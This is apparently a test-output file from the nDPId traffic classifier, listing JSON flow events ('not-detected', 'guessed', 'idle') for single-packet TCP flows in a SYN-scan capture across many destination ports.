+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 